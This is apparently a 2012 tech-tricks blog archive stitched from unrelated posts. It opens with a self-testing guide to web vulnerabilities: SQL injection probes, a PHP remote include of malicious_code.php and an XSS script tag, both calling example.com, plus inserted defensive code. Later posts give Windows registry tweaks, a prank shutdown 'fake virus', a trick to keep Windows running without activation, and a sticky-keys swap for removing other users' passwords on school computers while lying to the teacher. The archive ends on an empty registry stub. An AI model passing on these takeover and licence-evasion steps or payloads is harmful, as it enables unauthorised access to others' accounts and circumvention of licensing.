Tuesday, September 25, 2012

Top 5 Ways to Hack into Your Web Application (and how to close those security loopholes!)

 

Are you familiar with white hat hacking? If you aren’t, you should be. White hat hacking is a planned attack that checks your systems for vulnerabilities. After the hacker successfully (and harmlessly) compromises your environment, they tell you what to do to fix it.

Even though most security loopholes are well-documented, I’m surprised how many open exploits are in applications that we security scan here at INetU. So stand by for a little White Hat Hacking 101, where I’ll teach you how to hack into your own site.

Hack One: Injection Attacks

I’ll start with injection exploits because most IT professionals, even though they have a basic understanding of the dangers, leave too many sites open to the vulnerability, according to the Open Web Application Security Project (OWASP). Injection is passing malicious user-supplied data to an interpreter. The most common form is SQL Injection, where the hacker passes a SQL command to your database.
Are you at risk? Let’s find out.
Find a page on your application that accepts user-supplied information to access a database:
  • A login form, signup form, or “forgot password” form is a good start.
  • A dynamic page that uses URL variables such as ID (product information pages are good for this).
Knowing that the database command takes the user-supplied information into a WHERE clause, try to finish the command with SQL that will throw an error. So on our login form, perhaps we want to try putting this into the username: username' or fake_column IS NULL. If you are greeted with a database error message page, success! You’ve hacked your own site.
The Risk: Our hack above seems pretty harmless, but it just finds the place in your application susceptible to malicious code injection. Once a hacker knows they have an unprotected line to your database, the possibilities are endless: vandalism, data theft, or even total system compromise.
The Fix: There are two main ways to protect your site from injection: 1) always sanitize user-submitted data (if a username can’t contain a single quote character, don’t let users enter it), and 2) use a web-specific database login that has the least permissions necessary to perform its tasks (your web application doesn’t need admin access to your database). OWASP has a SQL Injection Prevention Cheat Sheet that is also particularly helpful.
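
The self-test and the first fix above, as an added example that is not part of the original article: a login lookup built by string concatenation next to the same lookup with a bound parameter and an allowlist check. It goes one step beyond the text by binding the value as a parameter, which is the first option in the OWASP cheat sheet mentioned above; the table, function names and username policy are assumptions made for the example.

```python
import re
import sqlite3

# Assumed username policy for this example: no quotes, no spaces, max 32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# The probe string from the text above.
PROBE = "username' or fake_column IS NULL"


def make_db():
    """Constructed in-memory database standing in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE)")
    conn.execute("INSERT INTO users (username) VALUES ('alice')")
    return conn


def lookup_vulnerable(conn, username):
    """BEFORE: user input is concatenated into the WHERE clause."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, username):
    """AFTER (1): the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()


def lookup_validated(conn, username):
    """AFTER (2): reject input outside the allowlist, then bind it anyway."""
    if not USERNAME_RE.fullmatch(username):
        return None
    return lookup_parameterized(conn, username)


def outcome(lookup, value):
    """Run one lookup against a fresh database and summarise what happened."""
    conn = make_db()
    try:
        row = lookup(conn, value)
    except sqlite3.Error as exc:
        # This is the "database error message page" the self-test looks for.
        return "db-error: " + str(exc)
    finally:
        conn.close()
    return "row" if row else "no-row"


if __name__ == "__main__":
    for fn in (lookup_vulnerable, lookup_parameterized, lookup_validated):
        print(fn.__name__, "->", outcome(fn, PROBE))
```

The concatenated query turns the probe into broken SQL and surfaces a database error; the other two treat the whole string as a username that simply does not exist.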

Hack Two: PHP Remote File Includes

If your site doesn’t use any PHP, then good news: you’re safe! But according to the SANS Institute, PHP is the most popular web application framework. When used properly, PHP can be a very powerful and useful tool for a number of different applications. Perhaps because of its popularity, it’s also an enticing target for hackers to find exploits. The PHP function allow_url_fopen is a favorite for hackers not only because it allows them to run their scripts on your site, but also because it is enabled by default.
Are you at risk? Let’s find out.
Find a PHP script that uses the include() function. If you have a path name in the include, change it to the absolute URL equivalent. If the file still works after this change, success! You’ve just hacked your own site.
The Risk: Okay, the hacker might need to do a little more legwork in this example, but it severely increases the surface area for attack. All a hacker needs to do is find one file to manipulate and add the line: include('http://www.example.com/malicious_code.php') and you are compromised. Compromise might include password stealing, remote rootkit installation, and in some cases complete system compromise.
The Fix: Turning off allow_url_fopen is the most obvious fix, but if that isn’t an option, you can try turning on PHP’s safe mode to prevent the most common malicious functions from executing on your server. Keep PHP updated with the latest security patches and be aware of emerging threats by following tech news outlets.
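
One way to check the setting named in the fix, as an added example that is not part of the original article: a small auditor that reads php.ini text and reports the effective value of allow_url_fopen. It goes slightly beyond the text by also reporting allow_url_include, the PHP directive that controls whether include() and require() accept URLs; the sample ini contents are constructed, and treating the last assignment as the effective one is an assumption of this example.

```python
# Values PHP treats as "on" for a boolean directive (case-insensitive).
PHP_TRUE = {"1", "on", "true", "yes"}

# Built-in defaults used when php.ini does not mention the directive:
# allow_url_fopen is enabled by default (as the text notes), allow_url_include is not.
DEFAULTS = {"allow_url_fopen": True, "allow_url_include": False}

# Constructed sample configurations.
WEAK_INI = """\
; constructed sample: both directives enabled
[PHP]
allow_url_fopen = On
allow_url_include = "1"   ; trailing comment
"""

HARDENED_INI = """\
; constructed sample: both directives disabled
[PHP]
allow_url_fopen = Off
allow_url_include = 0
"""

SILENT_INI = "[PHP]\nmemory_limit = 128M\n"  # constructed: directives absent


def effective_flags(ini_text):
    """Return the effective on/off state of the two directives."""
    flags = dict(DEFAULTS)
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop ; comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key in flags:
            # Assumption of this example: a later assignment overrides an earlier one.
            flags[key] = value.strip("\"'").lower() in PHP_TRUE
    return flags


def findings(ini_text):
    """List the settings a reviewer would want turned off."""
    flags = effective_flags(ini_text)
    result = []
    if flags["allow_url_fopen"]:
        result.append("allow_url_fopen is On: file functions can open URLs")
    if flags["allow_url_include"]:
        result.append("allow_url_include is On: include()/require() may load code from URLs")
    return result


if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI), ("silent", SILENT_INI)):
        print(name, findings(text) or "no findings")
```

A file that never mentions allow_url_fopen is still reported, because the default is enabled.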

Hack Three: Cross Site Scripting (XSS)

Cross Site Scripting occurs when a website takes malicious user input and, without question, posts the input to their page. The most common reason for a web application to do this is capturing user feedback: product reviews, blog comments, etc. As today’s Internet user can open discussions and interact with more websites, XSS hacks are becoming an ever-prevalent problem, possibly soon to be the most common vulnerability on the Internet.
So are you at risk? Let’s find out.
Search your application for a page that takes user input and outputs it directly to a webpage. Common examples:
  • Forums
  • Comments
  • Wikis
  • Reviews
Craft a post that calls on JavaScript from an outside server. For example, try to post: This is a hacked entry <script src="http://www.example.com/malicious.js"></script>. Now load the page where that post is output. Did your script run? Then success! You’ve just hacked your own site.
The Risk: The risk here is both for you and for your visitors. First, this opens your visitors to worms infected through the linked malicious code. Second, your site can be defaced with code that manipulates how your page displays. Third, your hijacked site can be flagged by Google and other search engines as a malicious site, and it could take you months to regain your page rank status. Lastly, it opens the next vulnerability: Cross Site Request Forgeries (CSRF).
The Fix: Fixing XSS and CSRF vulnerabilities requires the same steps, so read below.

Hack Four: Cross Site Request Forgeries (CSRF)

In a CSRF attack, a hacker uses a cross-site script to hijack a logged-in user’s credentials. If you are at risk for XSS, then you might be at risk for a CSRF attack. Are you? Let’s find out.
Does your application rely on credentials, like session cookies, to grant permissions to users on your site? If you don’t know offhand, try taking a look at the cookies your browser is storing when you login to your application. Even easier, if your site has a “remember me” feature for logging in, and you know from above you are vulnerable for XSS attacks, then success! You’ve just hacked your own site.
The Risk: The most common use of CSRF is to propagate a virus. The Samy MySpace Worm is a good example. Most security-aware users don’t trust random messages from profiles that look “spammy” and therefore don’t open themselves to catching an XSS worm. However, if that user has a friend who has been compromised, a CSRF attack can send a message as the trusted friend with the infected message, tricking the user into becoming infected. There are additional risks if the infected user has “moderator” or “admin” privileges on the site, because the hacker automatically gains those permissions, which could end with entire site compromise.
The Fix: Never trust user-supplied input. Erase any JavaScript supplied by the user, or for that matter, any encoded information. Or limit the user’s ability to a strict set of tags (bold and italic, for example) and remove modifiers to those tags on output. For more information OWASP has a comprehensive guide to protection against XSS attacks.
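
The tag-allowlist approach from the fix above, as an added example that is not part of the original article: user input is parsed, only bold and italic tags survive, their attributes ("modifiers") are discarded, script and style elements are dropped together with their content, and all remaining text is HTML-escaped on output. The class and function names are made up for the example, and the sample inputs are constructed apart from the post quoted in Hack Three.

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = ("b", "i")                 # the "strict set of tags" from the text
DROP_WITH_CONTENT = ("script", "style")   # removed together with everything inside


class _Allowlist(HTMLParser):
    def __init__(self):
        # convert_charrefs=True: entities arrive decoded and are re-escaped on output.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.dropping = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.dropping += 1
        elif tag in ALLOWED_TAGS and not self.dropping:
            self.out.append("<%s>" % tag)   # attrs are deliberately discarded
            self.open_tags.append(tag)
        # every other tag is dropped; its text content is kept and escaped

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif tag in self.open_tags and not self.dropping:
            # close everything opened after this tag so the output stays balanced
            while self.open_tags:
                closed = self.open_tags.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data))


def sanitize_comment(text):
    """Return text that is safe to place inside an HTML element body."""
    parser = _Allowlist()
    parser.feed(text)
    parser.close()
    while parser.open_tags:                 # close tags the user left open
        parser.out.append("</%s>" % parser.open_tags.pop())
    return "".join(parser.out)


# The post from Hack Three, plus two constructed inputs.
PAGE_POST = 'This is a hacked entry <script src="http://www.example.com/malicious.js"></script>'
STYLED_POST = '<b onmouseover="constructed()">bold</b> and <i>italic'
ENCODED_POST = "&lt;script&gt;x&lt;/script&gt;"

if __name__ == "__main__":
    for post in (PAGE_POST, STYLED_POST, ENCODED_POST):
        print(repr(sanitize_comment(post)))
```

An unclosed script element leaves the parser in dropping mode, so everything after it is discarded rather than emitted.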

Hack Five: Insecure Communications

This is perhaps one of the oldest tricks in the book: site operators and visitors often forget that everything transmitted across an insecure protocol (including FTP and HTTP) is plaintext, meaning that usernames, passwords, private messages, or even credit card information are ripe for the taking for a hacker with the proper tools. A “man-in-the-middle” attack occurs when a malicious user “sniffs” the packets sent between source and destination.
Are you at risk? Let’s find out.
Navigate to a page on your site where you fill out a form, or when user information is displayed to the site visitor. Is this happening through HTTPS? (Your browser should indicate a lock icon or a green location bar). If not, that information can be intercepted. Don’t forget FTP. Are your login credentials for an unsecured FTP port the same as for your database or other secured systems? Do you upload or download sensitive files through unsecured FTP? Success! You’ve just hacked your own site.
The Risk: This depends on what information a hacker is able to recover. The most basic security breach could be a simple invasion of privacy, but could also result in identity theft, leaking of confidential documents, or the compromise of admin passwords leading to full site compromise.
The Fix: The use of SSL certificates is the most common fix for web-based communication. SSL encrypts data before transmission and decrypts on arrival. The “man-in-the-middle” is left with (nearly) undecipherable encrypted data. Other technologies exist that can achieve the same end depending on the means of transportation. SSL isn’t a cure-all, however. Make sure to limit the private data you request from users, or subsequently transmit back to them. For example, when displaying the credit card number on file to a user, only display the last four digits, with asterisk marks replacing the remaining numbers.

How to Access Multiple Gmail accounts in Firefox without logout?

Do you have multiple Gmail accounts? As far as browsers are concerned, we can log in with only one Gmail account. Here I am going to introduce a new Mozilla add-on. This add-on will allow you to log in to multiple accounts without logging out of the others.





How to do it?

Visit:
https://addons.mozilla.org/firefox/addon/748
and install the add-on.

Now visit:
http://userscripts.org/scripts/show/16341
Click on the “Install” button located at the top right side.


Now you can access multiple Gmail accounts. You can see the drop-down box at the top right side.

Change the user as you wish without logging out.

Enjoy !

How to show SuperHidden files in XP and Vista?



Some files will be hidden from users. If you want to see those files, you have to edit the registry. This hack works for both Windows XP and Vista.

Go to Start -> Run
Type Regedit and press Enter
Navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
In the right panel, you can see the SuperHidden registry entry
Right-click on SuperHidden
Change the Data value to 1.
Click OK
Exit the registry and restart Windows.

How to block or disable the Autorun.inf file in Windows XP, Windows 7 - Registry Edit


Depending on the version of Windows that you are using, there are different updates that you must have installed to correctly disable the Auto-run functionality:
To disable the Auto-run functionality in Windows XP, in Windows Server 2003, or in Windows 2000, you must have security update 950582, update 967715, or update 953252 installed.



Simple way to disable autorun.inf:
Follow this link and download the MSI file:

http://go.microsoft.com/?linkid=9741395

Fix it yourself - Manually disabling the autorun feature:
To disable Autorun yourself on operating systems that do not include Gpedit.msc, follow these steps:
Click Start, click Run, type regedit in the Open box, and then click OK.
Locate and then click the following entry in the registry:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutorun
Right-click NoDriveTypeAutoRun, and then click Modify.
In the Value data box, type 0xFF to disable all types of drives. Or, to selectively disable specific drives, use a different value as described in the "How to selectively disable specific Autorun features" section.
Click OK, and then exit Registry Editor.
Restart the computer.

You can re-enable the autorun feature:
Follow this link:
http://go.microsoft.com/?linkid=9743275

Actually, I got this information from here:
http://support.microsoft.com/kb/967715
If you want more information or want to disable it in Vista, just visit the above link.

Monday, September 24, 2012

Use Windows 7 without Activation


Windows 7 is gaining more popularity due to its golden features and gadgets. However, you should activate your account to use Win7 for more than the 30 days of the trial period. But I think you all know about the "slmgr -rearm" command, which increases the trial period from 30 days to 120 days.



The hack (trick) shown here may be small, but by using this hack you can use Win7 for approximately one year without activation. So let's see the process.

Step-1: Go to Start ►All Programs ►Accessories. Now right-click on Command Prompt and select "Run as administrator".
Step-2: Now enter the command given below:

 slmgr -rearm
Now you will be prompted for a restart, so restart the computer. Once it has restarted, your trial period will be reset to 30 days again. You can use this command 3 times, so that you will get 120 days of trial period (30+30+30+30=120).
Step-3: Now here comes the real game: just navigate to Start ►Run and type "regedit", so that you will be taken to the Registry Editor.
Once you are there, navigate to the location given below:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Step-4: Once you navigate there you'll see a key called "skipRearm" on the right side of the panel. Just change its value to "1".
That's it. By doing this trick you will be able to use the command "slmgr -rearm" another 8 times, so that you will get another 240 days of trial period which you can use without activation.
With the whole thing you are able to get 120+240=360 days of trial period.

Windows 7 Tips, Tricks and Secrets.


Windows 7 users are increasing day by day, and it is a lot of fun exploring the tips, tricks and hidden secrets in Windows 7. In this post we have given some of our user-suggested tips, tricks and secrets. Let's fly around them!!!

 


PSR (Problem Steps Recorder):
Windows 7 has a great built-in feature called "PSR - Problem Steps Recorder" which helps you record problems caused by any program installed on your PC. As a PC guru, you are followed around by friends, relatives and others who want you to solve their irritating small PC software problems ;-( I know you are very frustrated by this because they don't even know how to describe their actual problem.
But Microsoft knew your pain, so they came up with a good solution (PSR): you can ask your friend/relative/others to run it and send you the generated report, so that you can solve their problem with ease.
Now let's see how to work with it. Just follow these simple steps.
Step #1: Click on "Start", type "PSR" and press Enter. Now press "Record".
Step #2: Now run the misbehaving application so that PSR records everything, like every click and key-press, takes screen grabs, and packages everything up into a single zipped MHTML file.
That's it, you are all set to go and solve the problem.

Start Up Repair:
At one time or another everybody faces a start-up problem, for a reason or for no reason, so it's good to create a system repair disc straight away in case you run into problems booting the OS later on. Just follow these simple steps.
Step #1: Click Start > Maintenance > Create a System Repair Disc
Step #2: Now let Windows 7 create an emergency boot disk.
If you get to the worst case, this disk will help you to boot.

Find out Hidden wallpapers and themes:
We all know that while Windows 7 is being installed it will ask for your country, time zone, etc. Based on your responses, Windows 7 automatically selects which wallpapers to install by default.
Suppose you selected your country as India; Windows 7 will then install some wallpapers which are related to India.
To unlock all the wallpapers just follow these simple steps.
Step #1: Click on Start and type "C:\Windows\Globalization\MCT" in the search box.
Step #2: Now a window will open with some sub-folders "MCT-AU, MCT-CA, MCT-GB, MCT-US, and MCT-ZA" in which you can select your hidden wallpapers.
Here AU, CA, GB, US, and ZA refer to Australia, Canada, Great Britain, United States and South Africa.

Import files over a network to Windows Live MovieMaker:
In Windows 7, by default Windows Live MovieMaker will not give you access to import files over a network, but a simple Registry tweak will make this happen. Just follow these steps.
Step #1: Run REGEDIT
Step #2: Now navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows Live\Movie Maker
Step #3: Now add a DWORD value called AllowNetworkFiles and set it to 1 to add network support.
That's it, you're done.

Custom Power Switch:
By default you see the "ShutDown" button on the Start menu. But if you are someone who reboots your PC several times a day, you can change "ShutDown" to "ReStart" in a few clicks by following these simple steps.
Step #1: Right-click on the Start button.
Step #2: Choose Properties and set the 'Power boot action' to 'Restart' to make it happen.
That's it, you're done!!

Best Windows 8 Shortcut Keys

Windows logo key+spacebar: Switch input language and keyboard layout
Windows logo key+O: Locks device orientation
Windows logo key+Y: Temporarily peeks at the desktop
Windows logo key+V: Cycles through toasts
Windows logo key+Shift+V: Cycles through toasts in reverse order
Windows logo key+Enter: Launches Narrator
Windows logo key+PgUp: Moves Metro style apps to the monitor on the left
Windows logo key+PgDown: Moves Metro style apps to the monitor on the right
Windows logo key+Shift+. : Moves the gutter to the left (snaps an application)
Windows logo key+. : Moves the gutter to the right (snaps an application)
Windows logo key+C: Opens Charms bar
Windows logo key+I: Opens Settings charm
Windows logo key+K: Opens Connect charm
Windows logo key+H: Opens Share charm
Windows logo key+Q: Opens Search pane
Windows logo key+W: Opens Settings Search app
Windows logo key+F: Opens File Search app
Windows logo key+Tab: Cycles through Metro style apps
Windows logo key+Shift+Tab: Cycles through Metro style apps in reverse order
Windows logo key+Ctrl+Tab: Cycles through Metro style apps and snaps them as they are cycled
Windows logo key+Z: Opens App Bar

Tuesday, September 11, 2012

List of some Google Syntax for search


Calculator:
The next time you need to do a quick calculation, instead of bringing up the Calculator applet, you can just type your expression in to Google.
Example:
48512 * 1.02

Word Definitions:
If you need to quickly look up the definition of a word or phrase, simply use the “define:” command.
Example:
define:internet

intitle:
This Syntax restricts your search to the titles of web pages. The variation allintitle: finds pages wherein all the words specified appear in the title of the web page. Using allintitle: is basically the same as using the intitle: before each keyword.
examples:
intitle:"george bush"
allintitle:"money supply" economics

You may wish to avoid the allintitle: variation, because it doesn’t mix well with some of the other syntax elements.

intext:
This Syntax searches only body text (i.e., ignores link text, URLs, and titles). While its uses are limited, it’s perfect for finding query words that might be too common in URLs or link titles.
examples:
intext:"hackingmore.blogspot.com/"
intext:html

There’s also an allintext: variation, but again, this doesn’t play well with others.

inanchor:
This Syntax searches for text in a page’s link anchors. A link anchor is the descriptive text of a link. For example, the link anchor in the HTML code
example:
inanchor:"hackingmore.blogspot.com/"
As with other in*: syntax elements, there’s an allinanchor: variation, which works in a similar way (i.e., all the keywords specified must appear in a page’s link anchors).

Link:
Lets you see which pages are linking to your Web page or to another page you’re interested in.
example:
link:http://hackingmore.blogspot.com/

site:
This Syntax allows you to narrow your search by either a site or a top-level domain.
examples:
site:hackingmore.blogspot.com
site:edu
site:nc.us

inurl:
This syntax restricts your search to the URLs of web pages. It tends to work well for finding search and help pages, because they tend to be rather regular in composition.
example:
inurl:help
You’ll see that using the inurl: query instead of the site: query has one immediate advantage: you can use it to search subdirectories. While the http:// prefix in a URL is ignored by Google when used with site:, search results come up short when including it in an inurl: query. Be sure to remove prefixes in any inurl: query for the best (read: any) results.

You can also use inurl: in combination with the site: syntax to draw out information on subdomains. For example, how many subdomains does google.com really have? A quick query will help you figure that out:
example:
site:google.com -inurl:www.google.com
This query asks Google to list all pages from the google.com domain, but leave out those pages which are from the common subdomain www, since you already know about that one.
Do you ever wonder how many subdomains Google has? I wondered!!!!

cache:
cache: finds a copy of the page that Google indexed even if that page is no longer available at its original URL or has since changed its content completely.
example:
cache:hackingmore.blogspot.com
If Google returns a result that appears to have little to do with your query, you’re almost sure to find what you’re looking for in the latest cached version of the page at Google. The Google cache is particularly useful for retrieving a previous version of a page that changes often.

filetype:
filetype: searches the suffixes or filename extensions. These are usually, but not necessarily, different file types; filetype:htm and filetype:html will give you different result counts, even though they’re the same file type. You can even search for different page generators—such as ASP, PHP, CGI, and so forth—presuming the site isn’t hiding them behind redirection and proxying. Google indexes several different Microsoft formats, including PowerPoint (.ppt), Excel (.xls), and Word (.doc).
examples:
"learn java" filetype:pdf
"IT books" filetype:doc

related:
related:, as you might expect, finds pages that are related to the specified page. This is a good way to find categories of pages; a search for related:google.com returns a variety of search engines, including Lycos, Yahoo!, and Northern Light.
examples:
related:www.yahoo.com
related:www.cnn.com
While an increasingly rare occurrence, you’ll find that not all pages are related to other pages.

info:
info: provides a page of links to more information about a specified URL. This information includes a link to the URL’s cache, a list of pages that link to the URL, pages that are related to the URL, and pages that contain the URL.
examples:
info:www.hackingmore.blogspot.com
info:www.nytimes.com/technology

Note that this information is dependent on whether Google has indexed the specified URL; if not, information will obviously be far more limited.

phonebook:
This syntax, as you might expect, looks up phone numbers.
examples:
phonebook:James Bond
phonebook:(511) 556-2725

Source: Google features

How To: Have Custom log-on Screen in Windows 7




The log-on screen is the screen that is presented to you when you log in to your computer (start it). It is really cool to have your picture or any custom picture there to impress your friends!

Tutorial:
=======

Step 1: Press "Start" and type "regedit" in "Search programs and files"

Step 2: Navigate to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background

Step 3: Double-click the DWORD key called OEMBackground and set the value to "1"

NOTE: if you can't see the DWORD key, just create a new one, name it "OEMBackground" and set the value to "1"

Step 4: Now put your desired photo in this folder " %windir%\system32\oobe\info\backgrounds " but keep in mind the picture should be less than 256 kb and the dimensions should be the same as the older picture present there.

Step 5: Now just reboot your computer and you will have the picture :)

Hope you liked it!

How to Secure your Private Folders


Do you have any private stuff that you would like to hide from your friends and relatives? Would you want it to be invisible so that it remains unnoticed by normal users? But there is software which can display all the folders that are present on the disk. So what if you could also password protect your folder? I guess having your private folder password protected as well as invisible should be secure enough. You might think that you need software for that. Well, here is a way to do it without using any additional software, and you can show off in front of your friends by making their folders invisible as well as password protected. Here is the step-by-step procedure to create a password protected folder.

How to create a Password Protected Folder

1. Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.

2. Now in this folder place all the important files, documents or any folders that you want to password protect.

3. Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.

4. Now a new compressed zipped folder gets created next to this folder (ABC) with the same name.

5. Double-click on this compressed zipped folder and you should see your original folder (ABC) here.

6. Now go to the File menu and select the option Add a password.

i.e.: File -> Add a password

Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible

1. Now Right-click on this password protected folder and select Properties.

2. At the bottom select the option Hidden and press OK. Now your folder becomes invisible (hidden).

3. In order to unhide this folder go to My Computer -> Tools -> Folder options. Switch to the View tab, scroll down and under Hidden files and folders you’ll see the following two options:
Do not show hidden files and folders
Show hidden files and folders

Now select the second option and press OK. Now the invisible folder becomes visible in its location. To access it you need the password. To make it invisible again repeat step 1 through step 3, select the first option and click OK. Now the folder becomes invisible once again.

Lock Your Computer with Easy Shortcut




Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.

Here are the steps to create a shortcut on your desktop to lock your computer:
  • Right-click the desktop. Point to New, and then click Shortcut.
  • The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation
  • Click Next. Enter a name for the shortcut. You can call it “Lock Workstation” or choose any name you like.
  • Click Finish.
SIMPLE WAY: The less complicated way is to hold the Windows key+L.

Insert your friend's picture in Facebook Chat.



Recently I was informed by my very good friend of this great trick in which you can add the picture of literally anyone in the Facebook chat. At first the trick only had :putnam: which would show a small face, but now there is something more cool in town ;)

TUTORIAL:

Step 1: Go to the profile of the user or page whose picture you want to add.

Step 2: Copy the username or profile ID from the page. Ex: http://www.facebook.com/hackingmore or http://www.facebook.com/profile.php?id=0000000000

Step 3: Now go to the chat and paste this username or profile ID inside double square brackets. Ex: [[hackingmore]]


Step 4: Now press Enter and the profile picture of that user or page will be sent to the other person.

Monday, September 10, 2012

How to make a fake virus in 1 minute

1: Right-click on the Desktop and choose New and then Shortcut.


2: Type in it shutdown -s -t 10 -c "Warning!!! Your Computer is Invaded and it will format for ever."

3: Now complete the shortcut and customize its icon by right-clicking it, then choosing the My Computer logo for it.

4: Now rename it as My Computer and replace My Computer on the Desktop with it.

5: Enjoy watching your friend dead with fear!! Hahaha.

How does it Work?

There is nothing to be scared of, because it only shuts down the computer and has no effect on the system.

Hack any Account Password in XP with Guest account.

Last time I showed you how to hack any account with an Administrator account, but that has some limitations, especially when you are in a school or college where full administrative rights are not given to your Limited Account. The following hack will 100% hack any account if you can get access to its Guest or Limited Account.

Step 1: Open C:\Windows\System32\

Step 2: Now rename sethc.exe to ss.exe (for backup).

Step 3: Now copy cmd.exe and paste it on the Desktop.


Step 4: Now rename the cmd.exe copy on the Desktop to sethc.exe and paste it in C:\Windows\System32

Step 5: Now restart the computer and on the log-on screen, where it asks you for the password, press the Shift button as fast as possible and a command prompt will appear.


Step 6: Type “net user (account’s name to hack) *” and press Enter 2 times to remove the password.


Step 7: Make an excuse to tell your computer lab teacher about how the password was automatically deleted. LOL
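
A defender's check for the swap described above, as an added example that is not part of the original post: it flags a System32 directory in which sethc.exe is byte-identical to cmd.exe, or in which the ss.exe backup name from Step 2 is present. The function names and the temporary fixture directories with dummy file contents are constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_sticky_keys(system32):
    """Return a list of findings for the given System32 directory."""
    system32 = Path(system32)
    sethc = system32 / "sethc.exe"
    cmd = system32 / "cmd.exe"
    backup = system32 / "ss.exe"
    findings = []
    if not sethc.is_file():
        findings.append("sethc.exe is missing")
    elif cmd.is_file() and sha256_of(sethc) == sha256_of(cmd):
        findings.append("sethc.exe is byte-identical to cmd.exe")
    if backup.is_file():
        findings.append("ss.exe is present (backup name from Step 2)")
    return findings


def build_fixture(root, tampered):
    """Constructed stand-in for System32; file contents are dummy bytes."""
    root = Path(root)
    (root / "cmd.exe").write_bytes(b"constructed cmd bytes")
    if tampered:
        (root / "ss.exe").write_bytes(b"constructed sethc bytes")
        (root / "sethc.exe").write_bytes(b"constructed cmd bytes")
    else:
        (root / "sethc.exe").write_bytes(b"constructed sethc bytes")
    return root


def demo():
    """Run the check against one clean and one tampered fixture."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as bad:
        return (check_sticky_keys(build_fixture(clean, False)),
                check_sticky_keys(build_fixture(bad, True)))


if __name__ == "__main__":
    clean_result, tampered_result = demo()
    print("clean:", clean_result)
    print("tampered:", tampered_result)
```

On a real machine the function would be pointed at C:\Windows\System32; a clean result only covers the one file swap this post describes.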

Use Gmail Storage Space as Hard Drive


Here I have some great little utilities (3 programs and 2 web scripts) that you can try in order to use your Gmail account space as your external hard drive. You will be able to download (or should I say copy) attachments from your Gmail account to your computer just as you would from a drive on your computer. You can also use this space to upload content directly from your computer and save it online in your Gmail account.

1. GMail Drive

GMail Drive is third party addon for Windows that lets you use your Gmail account space as an extra drive on your computer. It allows a user to access a virtual drive stored in a Gmail e-mail account by causing the contents of the Gmail account to appear as a new network share on the user’s workstation. In order to use this add-on, the user needs a Gmail e-mail account. The add-on enables the user to use the standard Windows desktop file copy and paste commands to transfer files to and from the Gmail account as if it was a drive on the user’s computer.


Download GMail Drive (http://www.viksoe.dk/code/gmail.htm )

2. GSpace

GSpace is a Firefox extension that turns the 3GB of your Gmail account into free online storage. With Gspace you can manage unlimited Gmail accounts to store all types of files within its simple, user-friendly interface. You can also listen to your favourite stored music directly from your Gspace, view your collections of pictures and manage your Gdrive files as well.


Download GSpace (http://www.getgspace.com/download.html )


3. GmailFS


GmailFS or Gmail File System is a virtual file system developed by Richard Jones which allows users to mount and use their Gmail email account’s storage as a local disk drive. GmailFS is written for Linux, but Windows and Mac OS X ports do exist. Using GmailFS will provide the user with roughly three gigabytes of online storage. The speed of this filesystem is limited by the speed of the user’s Internet connection, and the upload/download speed of the Gmail server. Files can be any size, and are stored as (segmented) attachments.

Download GmailFS (http://richard.jones.name/google-hacks/gmail-filesystem/gmail-filesystem.html )

4. G-Share


G-Share is a PHP script that allows you to share your Gmail attachments in a webpage; it is a download center with files stored in your Gmail account. You need a MySQL database to store data such as download counters, visitors, etc.


Download G-Share (http://sourceforge.net/projects/g-share/)


5. PHP Gmail Drive

PhpGmailDrive, also known as PGD, is an open source software program written in PHP to share Gmail file attachments on the web. PGD is based on GmailFS, a Gmail attachment file system that uses email subjects for organization.

Download PGD (http://pgd.sourceforge.net/)

Tip to speed up the Start Menu in Windows XP


Did you know you can customize the speed of the Start Menu by editing a Registry Key?

1) Click Start, and then click Run.

2) Type Regedit in the box, and then click OK.

3) Expand the menu in the left panel and select the HKEY_CURRENT_USER\Control Panel\Desktop folder.

4) Scroll down in the right panel and double click on the MenuShowDelay value.

5) In the Value Data box, change the default value for the menu speed from 400 to a lesser number, such as 1.

6) Click OK.

List of some Proxy Sites


Here is a list of some proxy sites from my Incredible List of 350+ Proxy Sites, which let you surf any web site. If you want that incredible list, just write a comment to this article and I'll email you that list.



How to see Hidden Content of Websites?


It is quite simple: you just need to change your browser’s User Agent. To do so, follow the steps given below:
Copy the following code segment into a Notepad file and save it as Useragent.reg

Windows Registry Editor Version 5.00

